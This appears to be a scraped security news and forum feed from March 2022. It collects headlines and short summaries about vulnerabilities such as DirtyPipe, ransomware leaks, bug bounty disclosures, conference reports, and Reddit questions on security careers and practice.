    What methods do you use to identify RCE (Remote Code Execution)? Personally, I like to use OOB (out-of-band). Time-based checks such as sleep are accurate too, but these days, with so much asynchronous logic, I think OOB is more accurate than timing (of course, I check both 😊). Naturally, depending on the service's infrastructure, there are many environments where outbound requests to the outside are restricted. Usually, though, the restriction applies to ordinary traffic; it is not common to block DNS queries as well. (If the attacker's domain is queried through the internal DNS, the attacker still ends up learning that the out-of-band web request was attempted.)
  • Open

John Carmack: How could anyone not like video games?
    The god of games
    Protecting finance with security: a review of the CIS 2021 Spring Edition fintech sub-forum
    On the afternoon of March 9, the fintech security session of the CIS 2021 Cybersecurity Innovation Conference Spring Edition was successfully live-streamed.
    CPPCC member Xiao Xinguang: three proposals focused on advancing cybersecurity scenario exercises, IT supply chain cybersecurity capability and software security engineering
    On March 10, the fifth session of the 13th National Committee of the CPPCC closed in Beijing. At this year's Two Sessions, CPPCC member and Antiy Group founder Xiao Xinguang submitted three proposals focused on advancing cybersecurity
    FreeBuf Weekly | Samsung's source code and 190GB of confidential data published; two more Firefox 0-day vulnerabilities
    Following the leak of 75GB of NVIDIA's confidential data and core source code, the ransomware group published 150GB of confidential data and core source code from South Korea's Samsung Electronics.
    The Emotet botnet is back, having infected 130,000 devices in 179 countries
    Since its return last November, Emotet has grown rapidly and gained new capabilities it never had before.
    A brief analysis of cryptographic security, part 2
    A block cipher is a symmetric-key algorithm. It splits the plaintext into multiple blocks of equal length and encrypts or decrypts each block separately using a fixed algorithm and a symmetric key. Block encryption is an extremely important component of encryption protocols; typical examples such as AES and 3DES are standard encryption algorithms approved by the US government.
    Challenging Amazon's and Microsoft's lead in the cloud market, Google plans to acquire security company Mandiant for $5.4 billion
    If the acquisition succeeds, Mandiant will join Google's cloud computing division to compete better with Amazon AWS and Microsoft Azure in the cloud market.
    To counter sanctions, Russia decides to create its own TLS root certificate
    The Russian government has now decided to create its own certificate authority, offering a solution for independently issuing and renewing TLS certificates.
    Guanzai Classroom | Analysis of an APT phishing email
    Recently a colleague reported receiving a suspected phishing email. The sender's name was that of a company colleague, but the sending address, comercial1@qualitypro.com.co, was not a company mailbox
    CIS2021 Spring Edition security compliance session live-stream review: cybersecurity experts offer advice on practice and development
    Security compliance is a pain point for many enterprises. At the CIS2021 Spring Edition security compliance session, five experts explored the road to enterprise compliance through their own constructive topics.
    CIS 2021 Spring Edition "5G and AI Security" session review: 5G puts security on the fast track
    The explosive growth driven by combining AI with industry is one of the major trends in the future development of China's mobile internet. Against this backdrop, network and information security has also been given a broader and deeper definition.
    Hackers target Ukraine's IT Army with a tainted DDoS tool
    Threat actors are using information-stealing malware that imitates Liberator, a tool commonly used by pro-Ukrainian hackers to attack Russian propaganda websites.
    Autohome is hiring cybersecurity interns
    Founded in 2005, Autohome is committed to providing consumers with one-stop services for researching, buying and using cars, along with quality automotive consumption and automotive lifestyle services.
    A brief discussion of identity management in the cloud era
    The cloud-based OneAuth service can mitigate these problems by providing single sign-on (SSO) across all of these applications, giving users a central place to access all their resources with a single username and password.
  • Open

Analysis of the Linux kernel privilege escalation vulnerability "DirtyPipe" (CVE-2022-0847)
    Author: Venustech ADLab. Original link: https://mp.weixin.qq.com/s/RoGHvNW2Y6dZOjgsBVVm5Q 01 Vulnerability details: Recently, researchers disclosed a Linux kernel local privilege escalation vulnerability. In the copy_page_to_iter_pipe and push_pipe functions, the "flags" member of a newly allocated pipe_buffer struct is not properly initialized and may contain the stale value PIPE_BUF_FL...
Analysis of the Linux kernel privilege escalation vulnerability DirtyPipe (CVE-2022-0847)
    Author: ghost461@Knownsec 404 Team. Date: March 11, 2022. Introduction: On February 23, 2022, the Linux kernel released a patch fixing an arbitrary file overwrite vulnerability (CVE-2022-0847) present in kernel 5.8 and later, which allows an ordinary user to escalate locally to root privileges. Because its principle is similar to the earlier DirtyCow (CVE-2016-5195) vulnerability, it was named DirtyPipe. On March 7, the vul...
  • Open

    Gallery Tryhackme Walkthrough part-1
    No content preview
    TryHackMe writeup: Steel Mountain
Steel Mountain is a TryHackMe room that sports a Mr. Robot theme. It is great for those into hacking shows and new to the scene! Continue reading on InfoSec Write-ups »
  • Open

    XSS via Mod Log Removed Posts
    Reddit disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1504410 - Bounty: $6000
    Open Redirect on https://.8x8.com/login?nextPage=%2F
    8x8 disclosed a bug submitted by ig420_vrush: https://hackerone.com/reports/1467046
  • Open

    How I was able to read any users confidential reports on a public level domain
    Hello all, today’s write up is about how I chained IDOR with BAC to read any users confidential reports on a public domain (we will call… Continue reading on Medium »
    Bypassing CSRF token protection by abusing a misconfigured CORS policy
    So, today I am going to teach you about a cool and interesting way of bypassing the token protection used against CSRF attacks by finding… Continue reading on Medium »
    Explore DeNet ecosystem and get a reward
    DeNet users can benefit while just exploring the ecosystem: perform tasks and simply check-in the app. Continue reading on DeNet | DFILE »
    Nexus Mutual Bug Bounty Matching Program Pays $200,000 To Whitehat
    The Nexus Mutual trial bug bounty matching program has just provided its first matching payout as part of its partnership with Immunefi: a… Continue reading on Immunefi »
  • Open

    CrowdSec releases first threat landscape report based completely on crowdsourced data from the community of CrowdSec users
    submitted by /u/klausagnoletti [link] [comments]
  • Open

    Moving from support engineer to cyber security?
Hello. Soon I start a support engineer job making 60k. Can I get a security analyst job after, with the right certifications? Should I look for a NOC job or something similar? Will that make at least 60k? What should I do? submitted by /u/throwaway_69333 [link] [comments]
    increasing range of wifi adapter
So is there a way to increase the range of my awus1900? The only way for me to connect to a wifi far away is to throw it out the window, like literally XD. I was thinking like a bigger antenna for it, if that would work. It already has very good range, but I find that it can't connect to wifis even though it sees them if they are like 50 meters away. Tried putting it up on the roof, but the range was better on the ground with all the buildings blocking it, for some reason. Well, I have no idea how this works, so that's why I'm asking. submitted by /u/Y0SH1zzzz [link] [comments]
    GCP Security Audit
Hi there, I never had experience with Google Cloud Platform. Is there a possibility to make a fast audit of: publicly exposed GCP hosts; GCP permissions for assigning external IPs; GCP firewall rules, for all projects (I have 40 projects) in the organization? submitted by /u/athanielx [link] [comments]
    Streaming websites asking for script permission
    Hey, some websites I've visited asks for permission to run a script called ????.com/remote_control.php, it gets blocked by NoScript. Wondering if this is a common script used in video streaming or if it is as malicious as it sounds? submitted by /u/Pollyypop [link] [comments]
    Does Alienvault upload any of our data?
Hi Guys, We're looking to deploy Alienvault OSSIM in our environment as a SIEM monitoring tool. I have reviewed this with my team, and the major concern we have is whether Alienvault uploads any of our data into the cloud and what exact data they upload, but I can't seem to find any resources online that explicitly state that. I was wondering if anyone here has any ideas/knowledge on this? Also happy if anyone has any suggestions on other free and open-source SIEM tools that can be used. submitted by /u/thetayoo [link] [comments]
    Career Switch 2.0
Hey guys.. So... I would like to ask you guys a couple of things, as this is gonna be a very new topic and a new chapter for me in my life. I am 27 y/o and know batshit about software/coding/development etc. I am always smart when it comes to the hardware side of computers and mobile devices: always find the fixes around and get the thing up and running. However, I want to get into EH or a related field. Anyways, I have been in customer service for the past 7 years, and that was because I was not able to pursue my dream in IT as I was broke T_T. But now I got the chance of either shifting to another country and learning and finding a job, or staying here and finding a job.. So I would like to ask a couple of questions from you guys about how tough it is and how badly it's gonna affect me, as it's a whole next-level chapter for me. Note that I am bad at maths (like I never learnt it at an advanced level). What is the study path? What's the best country to shift to for studies? (Thinking of Canada/US/UK) Is it necessary for me to start from scratch, like doing a certificate > diploma > degree > masters or whatever? Sites/platforms where I could study things related to the field? How badly is it going to affect me with the switch, since it is all new? What are the pros and cons of getting into this field? Any other advice or suggestions that come to your head. :) Edit: One more point I would like to add after seeing the comment from this guy: what's the study path and career path for hardware hacking? Thank you so much! Love you all <3 submitted by /u/PapadumSriLanka [link] [comments]
    Tenable - Audit Scan - No result
    Hello AskNetsec, I am trying to run a CIS L1 Compliance scan on my Microsoft Windows Server 2012 R2 Datacenter, and Microsoft Windows Server 2016 Datacenter though I keep getting no results. When I run a Debug scan it says the following: "Nessus has not identified that the chosen audit applies to the target device." It might be the case, though I am unsure as to what CIS scan to use instead. I would appreciate your help on this case. Thank you in advance. ________________________________________________________________________ Device full name, OS and version: "Mircrosoft Windows Server 2012 R2 Datacenter 6.3.9600" Chosen CIS: "Cis Windows Server 2012 DC L1 v2.2.0" And: "Cis Windows Server 2012 R2 DC L1 v2.5.0" _________________________________________________________________________ Device full name, OS and version: "Mircrosoft Windows Server 2016 Datacenter" Chosen CIS: "Cis Windows Server 2016 DC L1 v1.3.0" submitted by /u/Gabbana2 [link] [comments]
    Potential doxx advice
I was advised by a reply in r/AskComputerScience to post here, so here it is. Hi, I was on a call with someone on Discord who I didn't know on a personal level, and they told me some information about myself that is not public anywhere, e.g. my full name, address etc. (my Discord also is not linked to anything except my Steam account). I was wondering if anyone has any insight on how they managed this. It has quite shaken me up, as I have never had this happen to me before, as I am as careful as I can be with what information I give out online and always have been. Thanks submitted by /u/Confident_Lobster180 [link] [comments]
  • Open

    Ask HN: How would the Dirty Pipe vulnerability be exploited on Android?
I have seen articles claiming that the Dirty Pipe vulnerability could cause security issues and even root access on Android devices with the vulnerable kernel version. Can you explain how this would happen, as I presume each application is isolated through virtualization? Comments URL: https://news.ycombinator.com/item?id=30629680 Points: 2 # Comments: 1
  • Open

    If you're interested, the Microsoft Detection and Response Team (DART) will be holding an AMA next Tuesday on Tech Community answering questions on incident response and more
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-03-10 Review
Using CodeQL to analyze Dubbo RCE by ourren; Dependency-analysis-based software supply chain evaluation metrics for predicting changes in npm package popularity by ourren. For more of the latest articles, visit SecWiki
  • Open

    Pentesting toolkit: all you need to know
    “A Penetration Test is a technical assessment designed to achieve a specific goal.” Continue reading on Faraday »
    My Red Team Approach
    Initially, we conduct passive and active information gathering from publicly available sources to analyze which information is valuable… Continue reading on Medium »
    Red Team Tricks And Techniques
    Why Do I use VBA? Continue reading on Medium »
    Reflective DLL Injection
    Reflective DLL injection is a code injection technique that loads into a target process from memory. Reflective DLL injection is… Continue reading on Medium »
  • Open

    Rust fuzzing using cargo-libafl (LibAFL-based fuzzer)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

K8S security study (1)
    I have recently been studying K8S and related cloud-native technology, since I happen to be working with it. I had long wanted to find an opportunity to dig into exploitation and defense in this area, and hence this article.
    From cognitive warfare in cyberspace to large-scale crippling cyberattacks on Russia
    The tactics and launch methods of the large-scale cyberattack observed here have rarely been seen historically; NSFOCUS Tianyuan Lab conducted a detailed tactical and technical analysis of the attack.
    210,000 FB users "across time and space" shared the CIS 2021 Spring conference
    CIS 2021 Spring Edition in numbers: we present the answers with data.
    FreeBuf Morning Report | Multiple Russian government websites hit by a supply chain attack; UK publishes new rules to tackle the surge in scam ads
    Multiple Russian government websites hit by a supply chain attack: the websites of some Russian federal agencies suffered a supply chain attack in which attackers compromised a statistics tool that some government agencies use to track visitor counts.
    CIS2021 DevSecOps application and technology session concludes successfully; cybersecurity experts discuss security together
    On the morning of March 10, the CIS2021 DevSecOps application and technology session was live-streamed in full on the FreeBuf website, shared with thousands of netizens who enjoyed the excellent talks together.
    Another major CPU bug disclosed, affecting Intel, AMD and ARM
    Security researchers have found a new method that bypasses existing hardware-based defenses for speculative execution in Intel, AMD and ARM computer processors.
    App compliance practice: 3000 questions, part 2
    After the previous article "App Compliance Practice: 3000 Questions" was published, it got an enthusiastic response. Long awaited, the second installment of the 3000 questions on compliance practice now strides in.
    The huge potential of small-data AI
    We present our findings for all papers in the research cluster in terms of research progress, national competitiveness and funding. Through this analysis we hope to identify the current and expected research progress of these methods, determine which country is in the lead, and find the main sources of funding for this research.
    [Full PDF download] Complete analysis of the Conti leak; suspected member identities exposed!
    As the Russia-Ukraine conflict intensifies, hacker groups pick sides. On February 27, a large amount of the Conti ransomware group's internal data was leaked, from chat logs to the suspected identities of its members.
    CIS 2021 Spring Edition Data Security Forum concludes successfully; don't miss the excellent talks
    The Data Security Forum took an in-depth look at the latest data security protection technologies and the best operational frameworks.
    HP fixes 16 UEFI firmware flaws affecting laptops, desktops and PoS systems
    Recently, researchers at security firm Binarly discovered 16 high-severity Unified Extensible Firmware Interface vulnerabilities affecting HP enterprise devices.
    Intelligent connected vehicles face security tests
    As the proportion of connected cars keeps rising, such security problems are expected to become more prominent in the future.
  • Open

    Digital Forensics
Hello all. Had a question: I've been looking for an internship in Digital Forensics. Any suggestions? Been looking everywhere. Just want to get my foot in the door. Or anyone that can mentor me. I'm in the USA. submitted by /u/Sudden_Ad9859 [link] [comments]
    Forensic collections of O365 mailboxes
As the title suggests, what are people using/doing to collect O365 mailboxes that is not using the Microsoft Compliance eDiscovery portal, aka Nuix Workstation (GraphAPI), MailStore Client, so on and so forth? Any information on the pros and cons of the method you use, and any possible hiccups you have found during the course of using these apps. submitted by /u/Phorc3 [link] [comments]
  • Open

PROPHET SPIDER hackers exploit CVE-2021-22941 to deliver a webshell
    Translator: Knownsec 404 Team translation group. Original link: https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/ In early 2022, CrowdStrike Intelligence and CrowdStrike Services investigated an incident in which PROPHET SPIDER exploited a vulnerability affecting Ci...
  • Open

    [ Hack The Box ] Intel - Writeup
    It seems a huge trove of credit card details is being sold by a group going by the name flinchsec. Can you find any sites or artefacts… Continue reading on Medium »

  • Open

    Helpful Bug Bounty Resources
    Eight resources to help you on your bug bounty journey Continue reading on Medium »
    Hacking with sqlmap
    Sqlmap : Continue reading on Medium »
    OTP bypass via response manipulation and brute forcing.
    Hello Hackers, Continue reading on Medium »
    Introduction to Simple Buffer Overflow
    This article will provide an overview of exploit development, with a focus on creating Simple Buffer Overflow exploits. I’ll try to keep… Continue reading on Medium »
    The 10 Best Programming Languages for Hacking
    Before diving into this, it would be great to note that your programming of choice will much depend on the type of system you are… Continue reading on Medium »
    How To Become a Good Hacker? The Fundamental Skills
    These are the basics that every hacker should know before even trying to hack. Once you have a good grasp on everything in this section… Continue reading on Medium »
  • Open

    Do you grind or just learn on your own pace?
Hii, so I just graduated 2 months ago. I did one interview with a super cool guy in a cyber security company for an infosec job. He helped me a lot and liked the way I think, although I had many shortcomings. He told me to study Network+ and eLearnSecurity web penetration, and to keep practicing on HackTheBox, then interview again. The problem is that I have military service in 4 months, and it's obligatory. Currently I am studying Mike Meyers on Udemy for Network+; I read some reference books sometimes. And when I finish it I will start building my own network lab on GNS3. For the practical side I am practicing on HackTheBox, just ranked from noob to script kiddie. I still read writeups a lot and get stuck after I find a vulnerability, or sometimes even at enumeration. My question is: did you ever grind and work hard to achieve bigger outcomes in a shorter time? I feel like I should study more, I mean like I should stay up all night 2 days a week to finish all of that. And I feel like I should spend almost all of my day hacking. Sure, I can go out for an hour or two, but that is that. I fear I will have a burnout, but I also fear that I will keep learning basic stuff and it will take me forever to land a job. I want to be a pro and I know it's fucking hard, but this is my passion, since I used to create RATs during high school. I feel I should give it everything I have. I am an introvert with almost no friends anyways, so why not? Is a grinding mindset useful here? submitted by /u/Ramseesthe4th [link] [comments]
    Security risk analysis from Trojan?
    Hi there, Usually I'm very vigilant and can easily spot most net security scams and am educating others on how to avoid them. However at one of my jobs I've been waiting on someone to send me a report for a few weeks now and when an e-mail came up today on my work e-mail that looked to be that report, I finally fell for a viral e-mail. Basically the report was on a spreadsheet that I downloaded on the email through Thunderbird. It said that I needed to enable editing or press the view in browser button. This didn't make any sense to me and there was no "enable editing" thing that it mentioned, so that did ring alarm bells, but because I was waiting on a similar report from my upper manager, I ignored that and pressed the view in browser button. Now I'm not sure if this was prompted by my…
    Vulnerability Management
    Tracking Sec+ as a foundational certification but what additional certifications are valuable to have when seeking employment in the vulnerability management field? submitted by /u/5Crabby1s [link] [comments]
    SNMPv3 Password best practice.
I have taken over a 15-segment switch network that has been neglected in the use of best practices for many years. I have migrated from telnet to ssh, local logins to RADIUS, and so on. The only push back from my coworkers is the users and passwords for SNMPv3. They want each segment to have its own user and password, i.e. admin1 password1 for site 1, user2 password2 for site 2. We do this for the local passwords in case the site can't reach the RADIUS server. I do not care per se, but I can't find any useful information on this particular topic, and the monitoring systems we use make it difficult to set up SNMPv3 alone, and it goes downhill from there when setting up multiple users and passwords. In addition, we only use SNMP for monitoring. Can anyone direct me to some good information on this topic, or if they can take a moment of their time to explain it here? - Thank you in advance submitted by /u/NetworkRex [link] [comments]
    How could Russian military communication system require 3G or better to work?
Christo Grozev, leader of Bellingcat, claims the Russian military communication system Quartz (or Era) requires UMTS (3G) bandwidth in order to work. Or at the very least, I assume it's the bandwidth requirement which makes GSM (2G) insufficient. https://twitter.com/christogrozev/status/1500978613113524229?s=20&t=coMiAhwmqZQY5Wh60W9h4A I would have guessed Russian military phones used familiar protocols from the good old TLS suite, i.e. RSA/ECDSA for key exchange, AES for symmetric keys, and pre-installed FSB root CAs and individual client certs. Do you have any hypothesis on what design Quartz could have to make GSM bandwidth insufficient? Allegedly, two Russian operatives had to resort to unprotected GSM for a phone call. How is it possible that their encryption suite creates such a heavy data overhead? Do you have other hypotheses, unrelated to bandwidth requirements? submitted by /u/engineerL [link] [comments]
    How a Front-End Developer can get into Netsec?
Hi everyone! I'm a 23 year old web dev (working for 3 years). A few months ago I decided that I wanted to change the direction of my career and get into cyber security. My ultimate goal or dream job in security would probably be to become a penetration tester who works with a team of experts on getting into businesses through network vulnerabilities, service misconfiguration, or physically by phishing, social engineering and trying to get in the building (of course legally). I reckon it's a very specialised job and definitely not entry level, but I think it's important to mention the end goal to get the whole picture. I researched a lot about becoming a pentester. I spend my time on TryHackMe, as well as having rooted some retired machines on HackTheBox, of course using Kali; yet I feel I lack A LOT of knowledge and credibility, so here lies my problem. I fell into a rabbit hole of googling "which cert is the best", "how to become X", "best way to Y". So rather than digging deeper and deeper, I figured I'll just ask my own questions. Of course, what certs should I get? OSCP is an obvious answer, but I don't feel like I'm ready; also, I never got a cert in my life AND it's pretty expensive (I'm not even gonna mention SANS). Sec+ and Net+ are great intro certs, but they don't really help with HR, and I'm not sure if my web experience is enough for me. I feel like I have an okay grasp on network and security concepts. eJPT and eCCP teach you a lot, but are even less recognized by HR than the CompTIA ones. Isn't it better to take a step back and first try to become a SOC or sysadmin? Preferably Linux sysadmin. Should I just concentrate on HTB, start a blog, get PEN-200 and push for OSCP? Isn't it too risky? PS. I'm planning on moving to Germany, so I also spend time learning the language, and I have 7 months before I move out. I set myself a goal to get my netsec job there. I hope what I said makes sense. submitted by /u/Anvvir [link] [comments]
    What's exactly considered DoS/DDoS attack? (Multiple Cases)
Hey folks, I want to know exactly the definition, and I'll tell you why it's confusing me. Here are some cases: 1. I sent a file that is actually an endless "while" loop. This means a DoS attack is every way of denying service by making the server use too many resources. 2. I sent a file that actually stops all the services/processes every five seconds. This means a DoS attack is actually every way of denying a service. 3. I'm just sending a lot of Ethernet frames in different ways (ping, HTTP, whatever). This means a DoS attack is every way of denying a service only by a massive amount of requests. ** I know it's kind of ridiculous, but if it's actually any way of denying service, would you also consider someone that physically disconnected the server cables a DoS attack? ** If the definition is number 1, are 2 machines that sent the same file already considered a DDoS? Thanks! BTW, is there an official list of the most common DoS/DDoS attack types in the last years? submitted by /u/Webly99 [link] [comments]
    Threat Model Stakeholders from a security team?
    Who are the appropriate personnel to include in a threat model from a security standpoint? Security Architects? Engineers? SOC analysts?? Vulnerability management personnel? Compliance? submitted by /u/bankster24 [link] [comments]
    RBAC question
    Hello, I am not in cyber however I am developing an org structure as part of my school assignment. The roles I came up with that are part of driving the RBAC implementation are: Role Dev Lead, Role Eng. Lead, Role Decomm. Lead, Role Maint. Lead and Auditor Lead. Are they close to RL roles? Thanks! submitted by /u/Hav0c_wreack3r [link] [comments]
  • Open

    Use of Unsafe function || Strcpy
    curl disclosed a bug submitted by shobhit2401200: https://hackerone.com/reports/1485379
    Binary output bypass
    curl disclosed a bug submitted by eliasknudsen: https://hackerone.com/reports/1468962
    Occasional use-after-free in multi_done() libcurl-7.81.0
    curl disclosed a bug submitted by luminixaaron: https://hackerone.com/reports/1463013
    Error Page Content Spoofing or Text Injection
    Krisp disclosed a bug submitted by mrirfan__07: https://hackerone.com/reports/1444031
Unsubscribe links leaked
    Krisp disclosed a bug submitted by blackxxhat: https://hackerone.com/reports/1439025
    RXSS on https://equifax.gr8people.com on Password Reset page in the username parameter
    Equifax disclosed a bug submitted by miguel_santareno: https://hackerone.com/reports/1463638
    Race condition in endpoint POST fetlife.com/users/invitation, allow attacker to generate unlimited invites
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1460373 - Bounty: $100
    High memory usage for generating preview of broken image
    Nextcloud disclosed a bug submitted by fancycode: https://hackerone.com/reports/1261225 - Bounty: $100
  • Open

    Demystifying E-Commerce Website Security
Having an E-Commerce website can have its fair share of risks these days. As a site owner that handles online payments, however, it's even more important to understand those risks and the best methods of preventing them from impacting not only your business but your customers as well. Here we'll be discussing the main aspects that are important to an E-Commerce website, the kinds of vulnerabilities that can impact your business, and how to take better preventative measures. Continue reading Demystifying E-Commerce Website Security at Sucuri Blog.
  • Open

    What is OSINT? (Part 3)
    The rules of the trade Continue reading on Medium »
What is VenApp, Venezuela's new social network?
    A few days ago an acquaintance sent me this: @VenAppSocial. On opening the profile, the first thing I saw was the description: “The new social network… Continue reading on Medium »
    What is third-party risk management?
    Third-party risk management (TPRM) is a type of risk management that focuses on identifying and mitigating risks associated with the usage… Continue reading on CodeX »
    What is BYOD (Bring Your Own Device) Policy
    BYOD, or Bring Your Own Device, is a growing trend in which employees use their personal devices for work. Companies that implement BYOD… Continue reading on CodeX »

    Branch History Injection - Circumventing Spectre-v2 Hardware Mitigations
    submitted by /u/LordAlfredo [link] [comments]
    Yarn, Pip, Composer & co: Vulnerabilities in popular package managers
    submitted by /u/SonarPaul [link] [comments]
    IDA Pro plugin: query based xref finder for vulnerability research
    submitted by /u/Martypx00 [link] [comments]
    Forgiva Enterprise: A password manager that never saves your passwords.
    submitted by /u/marcusfrex [link] [comments]

    Linux Privilege Escalation: DirtyPipe (CVE 2022-0847)
    Introduction CVE 2022-0847 is a privilege escalation vulnerability discovered by Max Kellerman present in Linux Kernel itself post versions 5.8 which allows overwriting data in The post Linux Privilege Escalation: DirtyPipe (CVE 2022-0847) appeared first on Hacking Articles.

    Revisiting Phishing Simulations
    Rethinking the way that we approach phishing as a component of red team operations Continue reading on Posts By SpecterOps Team Members »

    SecWiki News 2022-03-09 Review
    Cyber Threat Intelligence Sharing Platforms from the User's Perspective by ourren; CodeBERT: A Pre-Trained Model for Programming and Natural Languages by ourren; A Brief Discussion of eBPF-Based Malicious Exploitation and Detection Mechanisms in Linux by ourren; The Future of Security Is Context by ourren. For more of the latest articles, visit SecWiki.

    The Unique Challenges of Companies Born in the Cloud
    There are stark differences between how to manage security policies for on-premises network environments and those that are 100% cloud-based. But many companies continue to struggle with those differences and have experienced plenty of pain as a result. It’s a challenge Rich Mogull has spent years trying to help companies navigate. Mogull, CISO at Firemon, […] The post The Unique Challenges of Companies Born in the Cloud appeared first on Security Weekly.

    Triaging A Malicious Docker Container
    submitted by /u/MiguelHzBz [link] [comments]

    AutoWarp: Vulnerability in Azure Cloud allows access to all company accounts
    Article URL: https://twitter.com/Yanir_/status/1500863874412724229 Comments URL: https://news.ycombinator.com/item?id=30614889 Points: 5 # Comments: 0
    APC UPS – Critical Vulnerability
    Article URL: https://www.armis.com/research/tlstorm/ Comments URL: https://news.ycombinator.com/item?id=30612835 Points: 2 # Comments: 0

    Back to Basics: The TrustedSec Guide to Strong Cyber Hygiene
    Every day, new challenges, attacks, and vulnerabilities are publicized. Just as attackers and the threat landscape are constantly changing, adapting, and evolving, so too must the Blue Teams and defenders who protect organizations against these threats. While the old adage may have been that attacks are rare and unlikely to happen, a new mentality of... The post Back to Basics: The TrustedSec Guide to Strong Cyber Hygiene appeared first on TrustedSec.

    Slight Increase in the Number of Cyberattacks on Industrial Control Systems
    In 2021 the share of ICS devices worldwide hit by cyberattacks rose slightly, to 39.6%, while in the second half of 2021 the share attacked was only 31.4%.
    Expert View: Security Safeguards for the Digital Transformation of Banking and Insurance
    梆梆安全 (Bangcle Security) supports the digital transformation of the banking and insurance industries.
    CIS 2021 Spring Edition Opens Its First Day of Livestreaming, 100,000 Viewers Cheer for Security Online
    The highlights don't end today: the CIS livestream room will meet you again tomorrow morning at 9:30, so be there on time.
    FreeBuf Morning Report | NPC deputy proposes jointly building a data-compliance governance platform; Google acquires cybersecurity firm Mandiant for $5.4 billion
    Google's parent company Alphabet announced on Tuesday that it plans to acquire cybersecurity company Mandiant for about $5.4 billion. If the deal closes, it will be Google's second-largest acquisition ever.
    A Summary of Network Security Device Knowledge
    Security devices 1. Firewall
    APC UPS Zero-Day Vulnerabilities Can Remotely Burn Out Devices and Cut Power
    A recently tracked set of three critical zero-day vulnerabilities, TLStorm, could let hackers take control of uninterruptible power supply (UPS) devices from APC, a subsidiary of Schneider Electric.
    A Plain-Language Guide to Information Gathering in Cloud-Native Environments (Part 2)
    Information gathering is a critical step on both the attack and defense sides; high-quality reconnaissance results are the first prerequisite for the work that follows to proceed smoothly.

    [Security Advisory] Microsoft's March 2022 Patch Tuesday Fixes Multiple High-Risk Vulnerabilities
    Microsoft recently released its March 2022 security patches, fixing 71 CVE vulnerabilities across 29 Microsoft products (not including 21 Micros...

    Building a Red Team - Which C2 to pick?
    Hello redteamsec community, my company wants to enhance the actual security testing services from basic assessments and penetration tests to red team engagements. At the moment we are planning the Red Team Infrastructure and I am currently looking for the best pick of a C2 Framework. I checked out the following: Covenant, PoshC2, Metasploit (if you can call it C2, you know what I mean). Further on my list are: Cobalt Strike, SilentTrinity, Apfell, FactionC2, Merlin. What gives me a hard time is how to decide on the framework we want to run. That's why I ask you what you guys recommend and WHY. Regards! submitted by /u/larryxt [link] [comments]
    A Summary of APT41 Targeting U.S. State Governments
    submitted by /u/dmchell [link] [comments]

    Large-ish mp3 library (Full albums, but selection can be hit or miss)
    Edit: After some further searching I had to make an edit, I'm sorry, the Full albums are unreliable for consistency, they are there but it's not guaranteed for every artist so please don't get your hopes up too high if looking for a specific album! The songs that are there are good quality though, that much I can guarantee from my searches! http://www.ashleecadell.com/xyzstorelibrary/ submitted by /u/migali [link] [comments]

    Phonebook, the way to DoS a company
    No content preview
    Healing blind injections
    No content preview
    How I created a Trojan Malware — Ethical Hacking
    No content preview

    The Purchase Order Is Fake, the Agent Tesla Attack Is Real
    Translator: Knownsec 404 Lab Translation Team. Original link: https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla Since phishing first appeared, fraudulent purchase orders have been one of the most common lures. The usual approach plays on the recipient's desire to avoid debt, especially where business interests may be involved. FortiGuard ...

    Does connecting to a network via Ethernet have any extra security risks vs connecting via WiFi?
    As in, if someone has access to your network via Ethernet, does it have any extra security risks to your system compared to if they were connected via WiFi? I'm thinking it depends on the type of internet your connection uses, eg fiber, cable, DSL, etc. submitted by /u/computerstuffs [link] [comments]
    How do you stay motivated to learn and prevent burnout?
    I'm already in a somewhat senior engineering role so I'm not forced to learn for school or to get a better job. I always want to keep driving myself to learn new things and stay on the cutting edge of infosec in order to both be more knowledgeable in my current role but also for my own curiosity. Balancing this with a full time+ career as well as family and social obligations feels exhausting sometimes. What do you guys do to stay motivated? submitted by /u/Deliveranc3 [link] [comments]
    What are your favorite data visualizations and analytics?
    Be it for threat hunting or making sure everything's hunky dory, for reporting activity or predicting trends, what do you like to see graphed, and what insights does it give you? I'm looking for more tools for the toolbelt. submitted by /u/Outside-Log-2104 [link] [comments]
    How to open a 120 GB SQL file without my PC?
    My SSD is low capacity; how do I open it? submitted by /u/mefumetsub [link] [comments]
    What was running in the shell when I logged in to a compromised server?
    I have some old sites I run for friends and family on a shared small webhosting place that has a cPanel Linux server. I don't use cPanel for much and don't know all that much about it. I forgot about a WordPress site I was running and someone got it and was able to then compromise the cPanel login. Shame on me for letting a WordPress site sit vulnerable, I know. But it happens. They were then able to get into cPanel. So they loaded up a few WordPress sites with phishing site stuff, and also sent out some phishing emails, all pretty standard stuff I've seen before. Lots of base64 php files and other standard WP hack php stuff. Something I hadn't seen before happened when I SSHed into the server, and I'm not sure what it was or what they had running. I logged in and immediately saw an error that I don't exactly remember, but it was a normal looking error about "no shell", I couldn't do anything, it was just an empty shell. None of the standard commands worked. So I logged in, and something caught my session and had me in... I don't know what. I did ctrl-d or maybe ctrl-c and was back to the normal shell on that server. Things looked normal again. I wasn't even sure I was on the server at first, so I didn't capture the exact errors I was seeing before the return to normal. One thing that I did notice was the title of my session in iterm2 had changed to what looked like a list of files on the server with ^M in between the names. So, something like access-logs^M^application-backups^M^dbs^M^ and so on, all the root level directories. By the time I gave it any thought, I had already cleaned up most everything and killed a couple of running processes. Any idea what I got into when I logged in to there? submitted by /u/blakesterz [link] [comments]
    Can the URL/IP of a microservice being requested by a server be found out?
    I currently have a Ruby on Rails server that does server-side rendering, and it calls one of my microservices. I have Basic Auth implemented for that microservice, but I wonder if it is possible for someone to find out where that microservice is and the header/body of my request? Can that be safely prevented by HTTPS? submitted by /u/hksparrowboy [link] [comments]
    How to best visualise risk from vulnerability findings based off CVSS scores?
    We got a report for the vulnerabilities across a system. The findings showed around 40 high vulnerabilities, 150 medium vulnerabilities and 300 low vulnerabilities. The problem I have is how to visually get this across to management as I can make it a simple pie chart but because of the 300 low vulnerabilities dwarfing the 40 high vulnerabilities it doesn't come across particularly well. Does anyone have any ideas? Also we've created a calculation to plot the average score by using cumulative total of all CVSS scores divided by the number of findings and because there's so many low findings with low scores this is causing it to look better than it is as having around 40 high vulnerabilities isn't good. Does anyone have any sort of formulas or calculations I can use to get this risk score across better? Thanks submitted by /u/nimdroid [link] [comments]
    Tool to manage vulnerabilities from different sources?
